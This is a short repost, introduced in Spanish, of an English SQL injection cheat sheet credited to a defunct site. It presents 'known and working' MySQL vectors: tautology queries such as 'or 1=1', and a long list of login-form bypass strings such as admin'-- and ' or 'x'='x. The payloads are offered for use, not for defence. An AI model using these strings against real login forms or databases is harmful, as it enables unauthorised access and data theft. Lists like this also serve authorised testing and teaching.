SQL Injection cheat sheet
Los siguientes «trucos» para SQL Injection son una colección de una web llamada 0x000000.com que lamentablemente en la actualidad no esta disponible, los tenía guardados por ahí hace tiempo y quiero compartirlos con ustedes:
A collection of known and working SQL vectors. These vectors are designed and tested by me on my localhost. I kept the list clean and concise tested for all MySQL versions to date unless stated otherwise. This sheet is under constant development, please come back often. Note that most of these vectors can be used on SQL server or Oracle but mainly it is written and tested for MySQL only. What I give you here is basicly everything you ever need to know about MySQL injection. You have to construct the pieces yourself and probably need to know what they do in order to use them.
Basics
SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
Use inside login form:
1' OR 1=1-- 1' OR '1' = '1 ' '' 'or"=' ') or ('a'='a ") or ("a"="a hi" or "a"="a or a=a-- admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a